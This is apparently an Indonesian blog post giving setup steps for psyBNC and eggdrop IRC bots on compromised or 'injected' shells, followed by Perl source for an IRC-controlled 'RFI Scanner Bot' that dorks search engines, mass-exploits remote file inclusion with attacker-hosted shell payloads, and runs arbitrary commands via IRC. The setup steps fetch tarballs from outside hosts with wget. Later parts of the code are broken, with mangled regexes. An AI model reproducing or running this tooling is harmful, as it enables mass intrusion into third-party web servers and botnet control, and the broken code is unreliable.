Sabtu, 12 Juni 2010

cara buat psyBNC

############################
#"Cara bikin simple psybnc #
############################
1. login shell anda ato dari target injek
2. wget http://ghambas.freehostia.com/irc/aris.tar.gz
3. tar -zxvf aris.tar.gz;rm -rf aris.tar.gz
4. cd ChuCu
5. ./config ident port;./fuck;./run
misal : ./config aku 2009;./fuck;./run
jadi di mirc anda akan menggunakan /server ip-shell:2009
Selamat Mencoba

cara bikin eggdrop

#######################################
"cara bikin bot eggdrop CBKTECH "
######################################
1. pertama login shell anda
2. wget http://img.bicsport.com/news/csv/cbktech.tar.gz
3. tar -zxvf cbktech.tar.gz;rm -rf cbktech.tar.gz
4. masuk ke dirctory .dat
5. ./ayu conf botnick identbot ip-shell channel owner
misal :
./ayu conf juvin juv 192.168.0.2 lonely jeleeekk
"#" - untuk melihat ip shell anda ketik /sbin/ifconfig atau ifconfig
6. ./dssl conf
7. untuk menambahkan tcl dengan command ./tcl -t conf nama.tclnya
*koleksi tcl klik disini atau kumpulan tcl
. selamat mencoba

bot scan rfi

########################################
## FeeLCoMz RFI Scanner Bot v4.9 ##
## By FaTaLisTiCz_Fx ##
## ? Agu-Nov 2008, FeeLCoMz Community ##
########################################
');
######################################################
## Usage: ##
## perl feelscanz.pl ##
## Notes: ##
## + All Parameters are optional ##
## ##
## Features: ##
## + RFI Scanner ##
## + RFI Scan & Exploit (Exploit per engine) ##
## + Joomla RFI Scan & Exploit ##
## + Milw0rm Search ##
## + Google bypass (Using PHP) ##
## + Message Spy & Save ##
######################################################
## History:
## + Fixed cryptz command (v4.5)
## + Fixed user commands execution by unauthorized user (v4.6)
## + Added options to enable/disable encrypted password (v4.7)
## + Fixed missing hostname on sublink (v4.8)
## + Added links filter to exclude exploiting bad links (v4.9)

use strict;

use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;

my $versi = "v4.9";
my $cmdpre = "."; #Command Prefix

##[ KONFIGURASI URL ]##
my $fx29id = "http://movie-net.tv/bbs/data/copyright.txt?"; #Fx29ID (Simple)
my $fx29id2 = "http://movie-net.tv/bbs/data/readme.txt?"; #Fx29ID (Advanced)
my $fx29sh = "http://movie-net.tv/bbs/data/cybersz.txt?"; #Fx29Sh
my $bypass = "http://www.ekosystem.org/googlerz.php?"; #Google Bypasserz

##[ KONFIGURASI SOURCE ]##
my $mysite = "http://www.geocities.com/"; #Path to Sources URL
my $spread = $mysite."lol.txt"; #Fx29Spreadz
my $joomlaz = $mysite."jombla.txt";

##[ KONFIGURASI IRC ]##
my @servers = ("irc.mildnet.org"); #IRC Servers (Separated by coma)
my %bot = (
nick => "scan[".int(rand(100))."]",
ident => "fX".int(rand(100)),
chan => ["#scan"], #Channels to join (Separated by coma)
server => $servers[rand(scalar(@servers))],
port => "6667"
);

##[ KONFIGURASI USER ##
## status: admin, user
## cryptz: 0 = Non-Encrypted Password, 1 = Encrypted Password
my %boss = (
freach => {
pass => 'fuck',
status => "admin",
cryptz => 0,
login => 0
},
freach => {
pass => 'fuck',
status => "admin",
cryptz => 1,
login => 0
},
freach => {
pass => 'fuck',
status => "admin",
cryptz => 0,
login => 0
},
);

##[ KONFIGURASI SPY ]##
my %spy = (
host => "", #Channels to show spied text
chanz => [""], #Channels to spy (Separated by coma)
wordz => ['http://.+?[=]'], #Text to spy (Regex, Separated by coma)
foundz => []
);

##[ KONFIGURASI BOT ]##
## Options: 0 = Disable, 1 = Enable
my %conf = (
showsite => 1, #Show link to debug channel (Yes/No)
linez => 3, #Lines per message
sleepz => 3, #Message delay per linez (seconds)
rfipid => 50, #Sites per proccess
rficnt => 100, #Counter setting
rficnt2 => 200, #Counter setting
timeout => 4, #Http socket time out
);

##[ KONFIGURASI WARNA ]##
my %colz = (
1 => " 0,1 [ ! ] 9 " , 2 => " 0[ ! ] ", #Header
3 => " 0,1 + [ 9 " , 4 => " 0] + ", #Proses
);

##[ PARAMETER BARIS PERINTAH ]##
$bot{chan} = "#".$ARGV[0] if $ARGV[0];
$bot{server} = $ARGV[1] if $ARGV[1];
$bot{port} = $ARGV[2] if $ARGV[2];

##[ INISIALISASI VARIABEL ]##
my $chanx = "#lscan"; #2nd Channel to show the results of vurnerable site
my $dbgchan = "#debugs"; #For debugging purposes (Optional)
my @chans = ($bot{chan});
my @badbugz = ("scan","bug"); #Bad bugs to cancel scanning
my @baddorkz = ("dork"); #Bad dorks to cancel scanning
my @badlinkz = ("access*log","accesslog","awstats","error.log","wwwstats","google.com"); #Bad links to exclude
my $keluar = 0;
my $sock;

##[ KONFIGURASI LOCALTESTING ]##
my $tez = $ARGV[3];
if ($tez == 1) {
my $situs = "http://localhost/fx29sh/";
$fx29id = $situs."fx29id1.txt?";
$fx29id2 = $situs."fx29id2.txt?";
$fx29sh = $situs."fx29sh.txt?";
}

##[ PROGRAM UTAMA ]##
if (fork() == 0) {
while ($keluar != 1) { irc_connect(); }
die("KeLuaR!");
}

##[ SUBRUTIN KONEKSI IRC ]##
sub irc_connect {
$sock = IO::Socket::INET->new(PeerAddr => $bot{server},
PeerPort => $bot{port},
Proto => 'tcp')
or die "Error: Ga bisa connect ke ".$bot{server}.":".$bot{port}."!\r\n";
$sock->autoflush(1);

irc_nick($bot{nick});
irc_user($bot{ident});

my ($baris,$hb);
my $loginboss = 0;
my $userstat = "";

while ( $baris = <$sock> ) {
$hb++;

##[ PARSING ]##
my $com;
my $me = $bot{nick};
my ($fcom,$dteks,@teks) = split(/\s+:/,$baris);
my ($duhost,$dcom,$dtarget) = split(/ /,$fcom);
my ($dnick,$dhost) = split(/!/,$duhost);
$dcom = "" unless ($dcom);
$dtarget = "" unless ($dtarget);
$dnick =~ s/://;
$dteks = trimrn($dteks);
if ($dteks =~ /^[$cmdpre](.*)/) { $com = $1; } else { $com = ""; }

#print $baris."\n$dnick | $dcom | $dtarget : $dteks\n";

##[ CEK USER ]##
if ($boss{$dnick}) { ($loginboss,$userstat) = ($boss{$dnick}{"login"},$boss{$dnick}{"status"}); }
else { ($loginboss,$userstat) = (0,""); }

##[ RESPON KE SERVER ]##
if ($dnick =~ /PING/) { irc_raw("PONG $dteks"); }
if ($dcom =~ /001/) { irc_join($chanx); irc_join($dbgchan); foreach my $c (@chans) { irc_join($c); } }
elsif ($dcom =~ /NICK|PART|QUIT/) { if ( $boss{$dnick}{"login"} == 1 ) { $boss{$dnick}{"login"} = 0; irc_ntc($dnick,"Logout!"); } }

##[ PERINTAH PUBLIK ]##
if (($dtarget) && ($dtarget eq $me)) { $dtarget = $dnick; }
if ($com =~ /^help$/) { bot_help($dtarget,1); }
elsif ($com =~ /^info$/) { bot_info($dtarget); }
elsif ($com =~ /^url(en|de)\s+(.*)/) {
my $url = $2; my $en;
if ( $1 eq "en" ) { $en = "Encode"; $url = urlen($url); }
elsif ( $1 eq "de" ) { $en = "Decode"; $url = urlde($url); }
msgi($dtarget,"URL $en", $url);
}
elsif ($com =~ /^cek\s+(http:\/\/.*[=])/) { cek_shell($dtarget,$dnick,$1); }
elsif ($com =~ /^respon/) { cek_respon($dtarget); }
elsif ($com =~ /^milw0rm\s+(.*)/) { milw0rm($dtarget,$1); }
elsif ($com =~ /^auth$|auth\s+(.*)/ && $boss{$dnick}) {
my $pass = $1; my $auth = $boss{$dnick}{"login"};
if ( $pass && $auth == 0 ) {
if ($boss{$dnick}{"cryptz"} == 1) { $pass = cryptz($pass); }
if ($pass eq $boss{$dnick}{"pass"}) {
$boss{$dnick}{"login"} = 1;
irc_ntc($dnick,"OK ".$boss{$dnick}{"status"}."!");
}
else { irc_ntc($dnick,"Error!"); }
}
else {
if ($auth == 0) { irc_ntc($dnick,"Blom auth!"); }
else { irc_ntc($dnick,$boss{$dnick}{"status"}."!"); } }
}
if ($dtarget && $dtarget ne $me) {
if (($com =~ /^scan\s+(.+?[=])\s+(.*)/) && (fork() == 0)) { s_scanz($dtarget,$1,$2,$hb,1); exit; }
elsif (($com =~ /^scan2\s+(.+?[=])\s+(.*)/) && (fork() == 0)) { s_scanz($dtarget,$1,$2,$hb,2); exit; }
}
##[ END OF PUBLIC ]##

##[ PERINTAH USER ]##
if ($loginboss == 1) {
if ($com =~ /^help/) { bot_help($dtarget,2); }
elsif ($com =~ /^join\s+(.*)/) { irc_join($1); push(@chans,$1); }
elsif ($com =~ /^part\s+(.*)/) {
my $pchan = $1; irc_part($1);
for my $i(0..scalar(@chans)) { if ($chans[$i] eq $pchan) { undef $chans[$i]; } }
}
elsif ($com =~ /^nick\s+(.*)/) { $bot{nick} = $1; irc_nick($bot{nick}); }
elsif ($com =~ /^hitung\s+([0-9].*)/) { $conf{rficnt} = $1; msgi($dtarget,"RFI Count",$conf{rficnt}); }
elsif ($com =~ /^bos$/ ) { my @bos = keys %boss; my $bos2 = join(" ",@bos); msgi($dtarget,"BoZz",$bos2); }
elsif ($com =~ /^cryptz\s+(.*)/) { msgi($dnick,$1,cryptz($1)); }
elsif ($com =~ /^logout$/ ) { $boss{$dnick}{"login"} = 0; irc_ntc($dnick,"Logout berhasil!"); }
elsif (($com =~ /^joomla\s+(.*)/) && (fork() == 0)) { s_scanz($dtarget,"",$1,$hb,3); exit; }
elsif ($com =~ /^sublink\s+(.*)/) { my @sl = lnk_sub($1); foreach my $e(@sl) { irc_msg($dtarget,$e); } }
elsif ($com =~ /^http(1|2|3)\s+(.+?)\s+(.*)/) {
my ($t,$nf,$q) = ($1,$2,$3);
my $h;
if ($t == 1) { $h = bukasitus($q); }
elsif ($t == 2) { $h = bukasitus2($q); }
else { $h = bukasitus3($q); }
f_simpan2($nf,$h); ntci($dnick,"SaVeD ($t)",$nf);
}
elsif ($com =~ /^regex(1|2)\s+(.+?)\s+(.*)/) {
my $n = $1;
my $q = bukasitus($2);
my $regex = $3;
if ($n ==1) {
if ($q !~ /$regex/) { irc_msg($dtarget,"Ga cocok!"); }
while ($q =~ m/$regex/g ) { irc_msg($dtarget,$1); sleep(1); }
}
else {
while ($q =~ m/http:\/\/(.*?)<\/a>/g) { irc_msg($dtarget,$2); sleep(1); }
}
}
}
##[ END OF USER ]##

##[ PERINTAH ADMIN ]##
if (($loginboss == 1) && ($userstat eq "admin")) {
if ($com =~ /^help/) { bot_help($dtarget,3); }
elsif ($com =~ /^chans/) { my $chans = join(",", @chans); ntci($dnick,"ChaNz",$chans); }
##[ PERINTAH SPY ]##
elsif ($com =~ /^spy$/ ) { ntci($dnick,"SpY","Host: ".$spy{"host"}." Chans: ".join(",", @{ $spy{"chanz"} })." Words: ".join(",", @{ $spy{"wordz"} })); }
elsif ($com =~ /^spy(found|show|clear)$/ ) {
my $n = $1;
if ($n eq "found") { msgi($dtarget,"SpYFouNd",scalar(@{ $spy{"foundz"} })); }
elsif ($n eq "show") {
my $i = 0;
for my $f (@{ $spy{"foundz"} }) { irc_msg($dtarget,$f); }
$i++; if ($i % $conf{linez} == 0) { sleep($conf{sleepz}); }
}
elsif ($n eq "clear") { $spy{"foundz"} = []; msgi($dtarget,"SpyList","DiBersiHkaN!"); }
else { msge($dtarget,"Spy","PeRinTah SaLah!"); }
}
elsif ($com =~ /^spyhost\s+(.*)/ ) { $spy{"host"} = $1; ntci($dnick,"SpYHosT",$spy{"host"}); }
elsif ($com =~ /^spychan\s+(.*)/ ) {
unless ($spy{"host"}) { msge($dtarget,"SiLaHkaN SeT SpyHost TerLebih DahuLu!",""); }
else{ irc_join($1); push @{ $spy{"chanz"} }, $1; my $chans = join(",", @{ $spy{"chanz"} }); ntci($dnick,"SpYChaNz",$chans); }
}
elsif ($com =~ /^spyword\s+(.*)/ ) { push @{ $spy{"wordz"} }, $1; my $words = join(",", @{ $spy{"wordz"} }); ntci($dnick,"SpYWoRDz",$words); }
##[ END OF PERINTAH SPY ]##
elsif ($com =~ /^quit/) { irc_quit("Good Bye!"); $keluar = 1; exit; }
elsif ($com =~ /^keluar/) { irc_quit("Killed!"); $keluar = 1; system("killall perl"); exit; }
elsif ($com =~ /^raw\s+(.*)/) { irc_raw($1); }
elsif ($com =~ /^rfipid\s+([0-9].*)/) { $conf{rfipid} = $1; msgi($dtarget,"RFI Pid",$conf{rfipid}); }
elsif ($com =~ /^cshell\s+(.*)/) { $fx29sh = $1; msgi($dtarget,"Injector RFI",$fx29sh); }
elsif ($com =~ /^crespon(1|2)\s+(.*)/) {
my ($n,$url) = ($1,$2);
if ($n == 1) { $fx29id = $url; }
elsif ($n == 2) { $fx29id2 = $url; }
msgi($dtarget,"Respon $n RFI",$url);
}
elsif ($com =~ /^cspread\s+(.*)/) {
my $url = $1;
$spread = $url;
msgi($dtarget,"Spread RFI",$spread);
}
elsif ($com =~ /^\+bos\s+(.+?)\s+(.*)/) {
$boss{$1}{pass} = "fx";
$boss{$1}{status} = $2;
$boss{$1}{login} = 0;
$boss{$1}{cryptz} = 0;
ntci($dnick,"BoZz","$1 ditambahkan sbg ".$boss{$1}{status});
msgi($1,"BoZz","Hai $1! Ketik .auth ".$boss{$1}{pass});
}
elsif ($com =~ /^eval\s+(.*)/) { eval($1); }
elsif (( $com =~ /^cmd\s+(.*)/) && ( fork() == 0 ) ) {
my $cmd = $1;
if ($cmd =~ /cd (.*)/) { chdir("$1") || irc_msg($dtarget,"Ga bisa ganti dir!"); return; }
my @output = `$cmd`;
my $i = 0;
foreach my $out (@output) {
$i++; if ($i % $conf{linez} == 0) { sleep($conf{sleepz}); }
irc_msg($dtarget,"$out");
}
exit;
}
}
## END OF ADMIN ##

##[ MATA-MATA ]##
if ($dtarget ne $spy{"host"}) {
my $is_spychan = grep $_ eq $dtarget, @{$spy{"chanz"}};
if ($is_spychan == 1) {
for my $t (@{$spy{"wordz"}}) {
if ($dteks =~ /$t/) {
msgi($spy{"host"},"!",$dteks); sleep(1);
push @{ $spy{"foundz"} }, $dteks;
}
}
}
}
##[ END OF MATA-MATA ]##
}
## END WHILE ##
}
## END KONEK ##

#########################
##[ RUTIN EKSPLOITASI ]##
#########################
sub s_scanz {
my ($to,$bug,$dork,$sb,$type) = @_;
$sb = "Fx".$sb.".txt";
$dork = bersihdork($to,$dork);
my %typez = (
1 => "RFI ScaNneR",
2 => "RFI ScaN & ExpLoiT",
3 => "JooMLa MaSs ScaN & ExpLoiT"
);
my $badbug = cek_bug($bug);
if ($badbug == 1) { msge($to,"BuG","BuGnya JeLek! ScaNNinG DiCanCeL"); return; }
my $baddork = cek_dork($dork);
if ($baddork == 1) { msge($to,"DoRk","DorKnya JeLek! ScaNNinG DiCanCeL"); return; }
if ($type == 3) {
my $h = bugjoomla("hitung");
if ($h == 0) { msge($to,"Joomla","BuGnya Ga BiSa DiLoaD! ScaNNinG DiCanCeL"); return; }
}
irc_msg($to,$colz{1}."MeMeRikSa ReSpoN..".$colz{2});
my $stat = cek_respon($to);
if ($stat != 2) { irc_msg($to,$colz{1}."ReSpoN eLek cOOOOkk..nDanG diGanti sEXs!".$colz{2}); return; }
irc_msg($to,$colz{1}." ".$typez{$type}." StaRt! 0 ".$conf{rfipid}."/PID 9ID: 0 $sb".$colz{2});
irc_msg($to,$colz{1}." BuGz: 0 $bug ") if ($type != 3);
irc_msg($to,$colz{1}." DoRkz: 0 $dork ");
s_cari($to,$dork,$sb,$bug,$type);
s_eksploit(1,$to,$bug,$dork,$sb) if ($type == 1);
irc_msg($to,$colz{1}." ".$typez{$type}." FiniSh! 0 $dork 9ID: 0 $sb".$colz{2});
return;
}

sub s_eksploit {
#Type: 1 = Biasa, 2 = Cari dan exploit, 3 = Joomla
#Engine: Kosong = Eksploit total, Ada = Eksploit per engine
my ($type,$chan,$bug,$dork,$tf,$engine) = @_;
my @prosesbaru;
my @semuatarget;
my $hitung;
my $num = 0;
my @bugjoomla = bugjoomla($chan) if ($type == 3);
unless (open(FILEZ,"< $tf")) { msge($chan,"FILE","Ga BiSa BuKa $tf!"); return; } while (my $r = ) { $r =~ s/\n//g; push(@semuatarget,$r); }
close(FILEZ);
f_hapus($tf);
my @kotor = lnk_sortir(@semuatarget);
my @target = lnk_filter(@kotor);
if (!$engine) {
irc_msg($chan,$colz{1}."HaSiL PeNCaRiaN 0 $dork".$colz{2});
irc_msg($chan,$colz{1}."ToTaL: 0 ".scalar(@semuatarget)." 9KoToR: 0 ".scalar(@kotor)." 9BeRsih: 0 ".scalar(@target)." 9ID: 0 $tf".$colz{2}." ".$colz{1}." ExpLoiTaSi DiMuLai! ".$colz{2});
}
foreach my $situs (@target) {
$hitung++;
if ($hitung % $conf{rfipid} == 0) {
foreach my $f (@prosesbaru) { waitpid($f,0); }
$num = 0;
}
if ($type == 1 && $hitung % $conf{rficnt} == 0) {
irc_msg($dbgchan,$situs) if ($conf{showsite} == 1);
irc_msg($chan,$colz{3}.$hitung." 3 ".scalar(@target).$colz{4});
}
if ($type != 1 && $hitung % $conf{rficnt2} == 0) {
irc_msg($dbgchan,$situs) if ($conf{showsite} == 1);
irc_msg($chan," 9,1 $engine 15 ".$hitung." 14 ". scalar(@target). " ");
}
$prosesbaru[$num] = fork();
if ($prosesbaru[$num] == 0) {
if ($type != 3) {
my $q = bukasitus("http://".$situs.$bug.$fx29id."?");
if ($q =~ /FeeLCoMz/) { safemode(1,$chan,$situs,$bug,$engine); sleep($conf{sleepz}); }
}
else {
foreach my $bug (@bugjoomla) {
my $q = bukasitus("http://".$situs.$bug.$fx29id."?");
if ($q =~ /FeeLCoMz/) { safemode(1,$chan,$situs,$bug,$engine); sleep($conf{sleepz}); }
}
}
exit(0);
}
$num++;
}
irc_msg($chan,$colz{1}."MeNunGGu ".scalar(@prosesbaru)." PID ProSes EksPLoiTasi..".$colz{2}) if (!$engine);
foreach my $f (@prosesbaru) { waitpid($f,0); }
irc_msg($chan," 9,1 $engine 0FiNizZ! ") if ($engine);
}
###########################
##[ RUTIN SEARCH ENGINE ]##
###########################################################################
## GOOGLE : AOL, *CompuServe, *Mahalo.com, *MySpace, *Netscape, *Ripple ##
## YAHOO : AltaVista, AlltheWeb, GoodSearch, *Rectifi ##
## LIVE : *A9.com, *Ms.Dewey, *Tafiti ##
## ASK : *iWon, Lycos ##
## LAINNYA : Abacho, Clusty, Dmoz, Euroseek, Fireball, Hotbot, Mamma, ##
## Virgilio, Webcrawler, Webde ##
## * Not implemented yet
###########################################################################
sub s_cari {
#Type: 1 = Cari saja, 2 = Cari dan eksploit, 3 = Cari dan eksploit Joomla
my ($chan,$dork,$nf,$bug,$type) = @_;
my @engz;
my $key = $dork;
$dork = urlen($key);
$engz[0] = fork(); if ($engz[0] == 0) { s_engine("google","Google",$type,$chan,$bug,$dork,$nf); exit; }
#$engz[1] = fork(); if ($engz[1] == 0) { s_engine("aol","Aol",$type,$chan,$bug,$dork,$nf); exit; }
#$engz[2] = fork(); if ($engz[2] == 0) { s_engine("netscape","Netscape",$type,$chan,$bug,$dork,$nf); exit; }
$engz[3] = fork(); if ($engz[3] == 0) { s_engine("yahoo","Yahoo",$type,$chan,$bug,$dork,$nf); exit; }
$engz[4] = fork(); if ($engz[4] == 0) { s_engine("live","Live",$type,$chan,$bug,$dork,$nf); exit; }
$engz[5] = fork(); if ($engz[5] == 0) { s_engine("ask","Ask",$type,$chan,$bug,$dork,$nf); exit; }
$engz[6] = fork(); if ($engz[6] == 0) { s_engine("google2","Google2",$type,$chan,$bug,$dork,$nf); exit; }
$engz[7] = fork(); if ($engz[7] == 0) { s_engine("altavista","Altavista",$type,$chan,$bug,$dork,$nf); exit; }
$engz[8] = fork(); if ($engz[8] == 0) { s_engine("alltheweb","AllTheWeb",$type,$chan,$bug,$dork,$nf); exit; }
$engz[9] = fork(); if ($engz[9] == 0) { s_engine("goodsrch","GoodSearch",$type,$chan,$bug,$dork,$nf); exit; }
$engz[10] = fork(); if ($engz[10] == 0) { s_engine("lycos","Lycos",$type,$chan,$bug,$dork,$nf); exit; }
$engz[11] = fork(); if ($engz[11] == 0) { s_engine("uol","Uol",$type,$chan,$bug,$dork,$nf); exit; }
$engz[12] = fork(); if ($engz[12] == 0) { s_engine("fireball","Fireball",$type,$chan,$bug,$dork,$nf); exit; }
$engz[13] = fork(); if ($engz[13] == 0) { s_engine("gigablast","Gigablast",$type,$chan,$bug,$dork,$nf); exit; }
$engz[14] = fork(); if ($engz[14] == 0) { s_engine("virgilio","Virgilio",$type,$chan,$bug,$dork,$nf); exit; }
$engz[15] = fork(); if ($engz[15] == 0) { s_engine("webde","Web.de",$type,$chan,$bug,$dork,$nf); exit; }
$engz[16] = fork(); if ($engz[16] == 0) { s_engine("mamma","Mamma",$type,$chan,$bug,$dork,$nf); exit; }
$engz[17] = fork(); if ($engz[17] == 0) { s_engine("clusty","Clusty",$type,$chan,$bug,$dork,$nf); exit; }
$engz[18] = fork(); if ($engz[18] == 0) { s_engine("dmoz","Dmoz",$type,$chan,$bug,$dork,$nf); exit; }
#$engz[19] = fork(); if ($engz[19] == 0) { s_engine("abacho","Abacho",$type,$chan,$bug,$dork,$nf); exit; }
$engz[20] = fork(); if ($engz[20] == 0) { s_engine("euroseek","Euroseek",$type,$chan,$bug,$dork,$nf); exit; }
$engz[21] = fork(); if ($engz[21] == 0) { s_engine("hotbot","Hotbot",$type,$chan,$bug,$dork,$nf); exit; }
$engz[22] = fork(); if ($engz[22] == 0) { s_engine("webcrawl","WebCrawler",$type,$chan,$bug,$dork,$nf); exit; }
irc_msg($chan,$colz{1}."MeNunGGu ".scalar(@engz)." PID ProSes SearCh EnGiNe..".$colz{2});
foreach my $e (@engz) { waitpid($e,0); }
}
sub s_engine {
my ($f,$se,$type,$chan,$bug,$dork,$ef) = @_;
my @hc;
if ($f eq "google" ) { @hc = se_google($chan,$dork,$ef); }
elsif ($f eq "google2" ) { @hc = se_google_m($chan,$dork,$ef); }
elsif ($f eq "aol" ) { @hc = se_aol($chan,$dork,$ef); } #Unused
elsif ($f eq "netscape" ) { @hc = se_netscape($chan,$dork,$ef); } #Unused
elsif ($f eq "yahoo" ) { @hc = se_yahoo($chan,$dork,$ef); }
elsif ($f eq "altavista") { @hc = se_altavista($chan,$dork,$ef); }
elsif ($f eq "alltheweb") { @hc = se_alltheweb($chan,$dork,$ef); }
elsif ($f eq "goodsrch" ) { @hc = se_goodsearch($chan,$dork,$ef); }
elsif ($f eq "ask" ) { @hc = se_ask($chan,$dork,$ef); }
elsif ($f eq "fireball" ) { @hc = se_fireball($chan,$dork,$ef); }
elsif ($f eq "gigablast") { @hc = se_gigablast($chan,$dork,$ef); }
elsif ($f eq "lycos" ) { @hc = se_lycos($chan,$dork,$ef); }
elsif ($f eq "live" ) { @hc = se_live($chan,$dork,$ef); }
elsif ($f eq "hotbot" ) { @hc = se_hotbot($chan,$dork,$ef); }
elsif ($f eq "virgilio" ) { @hc = se_virgilio($chan,$dork,$ef); }
elsif ($f eq "webde" ) { @hc = se_webde($chan,$dork,$ef); }
elsif ($f eq "uol" ) { @hc = se_uol($chan,$dork,$ef); }
elsif ($f eq "abacho" ) { @hc = se_abacho($chan,$dork,$ef); } #Unused
elsif ($f eq "mamma" ) { @hc = se_mamma($chan,$dork,$ef); }
elsif ($f eq "clusty" ) { @hc = se_clusty($chan,$dork,$ef); }
elsif ($f eq "dmoz" ) { @hc = se_dmoz($chan,$dork,$ef); }
elsif ($f eq "euroseek" ) { @hc = se_euroseek($chan,$dork,$ef); }
elsif ($f eq "webcrawl" ) { @hc = se_webcrawler($chan,$dork,$ef); }
my @cl = lnk_sortir(@hc);
msgr($chan,$se,scalar(@hc),scalar(@cl));
if (scalar(@cl) == 0) { exit; }
if ($type == 1) { foreach my $e (@cl) { f_simpan($ef,$e); } }
else {
my $ef2 = $f.$ef;
foreach my $e (@cl) { f_simpan($ef2,$e); }
if ($type == 2) { s_eksploit(2,$chan,$bug,$dork,$ef2,$se); }
elsif ($type == 3) { s_eksploit(3,$chan,$bug,$dork,$ef2,$se); }
}
}
##[ GOOGLE ]##
sub se_google {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 50; my $max = 5000; my $p = 0;
#my $url = "http://localhost/search/google.co.id.htm";
my $url = "http://www.google.co.id/search?num=".$num."&hl=id&q=".$key."&start=".$p."&sa=N";
my $murl = "http://www.google.co.id";
my $nxurl;
my $q = bukasitus($url);
if ( $q !~ /2008 Google/ ) { msge($chan,"Google","KeNa BaN!!"); @daftar = se_gbypass($chan,$key,$nf); }
if ( $q =~ /dari sekitar (.+?)<\/b>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Google","$h");
}
if ( $q =~ /class=b>/ ) {
my $nxurl = $1; msgn($dbgchan,"Google","$nxurl");
}
while ( $q =~ m/
/ ) {
my $nxurl = $1;
msgn($dbgchan,"Google.".$dom,$nxurl);
msgn($chan,"Google.".$dom,"LaGi NyAri..");
}
while ( $q =~ m/
(.*?)<\/b>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Aol","$h");
}
if ( $q =~ // ) {
my $nxurl = $1; msgn($dbgchan,"Aol","$nxurl");
}
while ( $q =~ m/property=\"f:url\">http:\/\/(.*?)<\/p>/g ) { push (@daftar, $1); }
while ( $q =~ // ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/property=\"f:url\">http:\/\/(.*?)<\/p>/g ) { push (@daftar, $1); }
}
return @daftar;
}
##[ YAHOO ]##
sub se_yahoo {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 50; my $max = 8000; my $p = "1";
#my $url = "http://localhost/search/www.search.yahoo.com.htm";
my $url = "http://www.search.yahoo.com/search?p=".$key."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$p;
my $murl;
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /id=\"infotext\">
.*? of(.*?) for/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Yahoo","$h");
}
if ( $q =~ /999 Unable to process request at this time/ ) { msge($chan,"Yahoo","Banned!"); }
if ( $q =~ /Next/ ) {
my $nxurl = $1; msgn($dbgchan,"Yahoo","$nxurl");
}
while ( $q =~ m/26u=(.*?)%26w=/g ) { push (@daftar, $1); }
while ( $q =~ /Next/ ) {
$p++; if ( $p > $max ) { return @daftar; }
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/26u=(.*?)%26w=/g ) { push (@daftar, $1); }
}
return @daftar;
}
##[ ALTAVISTA ]##
sub se_altavista {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 100; my $max = 500; my $p;
#my $url = "http://localhost/search/www.altavista.com.htm";
my $url = "http://www.altavista.com/web/results?itag=ody&q=".$key."&kgs=0&kls=0&nbq=".$num."&stq=".$p;
my $murl;
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /Next/ ) {
my $nxurl = $1; msgn($dbgchan,"Altavista","$nxurl");
}
while ( $q =~ m/(.*?) <\/span>/g ) { push (@daftar, $1); }
while ( $q =~ /Next/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/(.*?) <\/span>/g ) { push (@daftar, $1); }
}
return @daftar;
}
##[ ALLTHEWEB ]##
sub se_alltheweb {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 100; my $max = 20; my $p = 1;
#my $url = "http://localhost/search/www.alltheweb.com.htm";
my $url = "http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=".$num."&q=".$key."&o=".$p;
my $murl;
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /(.+?)<\/span>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"AllTheWeb","$h");
}
if ( $q =~ /Next/ ) {
my $nxurl = $1; msgn($dbgchan,"AllTheWeb","$nxurl");
}
while ( $q =~ m/http:\/\/(.+?)<\/span>/g ) { push (@daftar, $1); }
while ( $q =~ /Next/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/http:\/\/(.+?)<\/span>/g ) { push (@daftar, $1); }
}
return @daftar;
}
##[ GOODSEARCH ]##
sub se_goodsearch {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 0; my $max = 300; my $p = 1;
#my $url = "http://localhost/search/www.goodsearch.com.html";
my $url = "http://www.goodsearch.com/Search.aspx?Keywords=".$key."&page=".$p."&osmax=".$num;
my $murl = "http://www.goodsearch.com/";
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /of about (.+?)<\/strong>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"GoodSearch","$h");
}
if ( $q =~ m/ Next<\/a>/ ) {
my $nxurl = $1; msgn($dbgchan,"GoodSearch","$nxurl");
}
while ( $q =~ m/http:\/\/(.*?)<\/a>/g ) { push (@daftar, $2); }
for ($p=2;$p<=$max;$p++) { $url = "http://www.goodsearch.com/Search.aspx?Keywords=".$key."&page=".$p."&osmax=".$num; $q = bukasitus($url); while ( $q =~ m/http:\/\/(.*?)<\/a>/g ) { push (@daftar, $2); }
if ( $q !~ m/http:\/\/(.*?)<\/a>/g ) { return @daftar; }
}
return @daftar;
}
## UOL ##
sub se_uol {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 10; my $max = 5000; my $p;
#my $url = "http://localhost/search/busca.uol.com.br.htm";
my $url = "http://mundo.busca.uol.com.br/buscar.html?q=".$key."";
my $murl = "http://busca.uol.com.br";
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /results\">(.+?)<\/strong>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Uol","$h");
}
if ( $q =~ // ) {
my $nxurl = htmltourl($1); msgn($dbgchan,"Uol","$nxurl");
}
while ( $q =~ m/




/g ) { push (@daftar, $1); }
for ($p=1;$p<=$max;$p += $num) { $q = bukasitus("http://mundo.busca.uol.com.br/buscar.html?q=".$key."&start=".$p); while ( $q =~ m/




/g ) { push (@daftar, $1); }
if ( $q !~ /






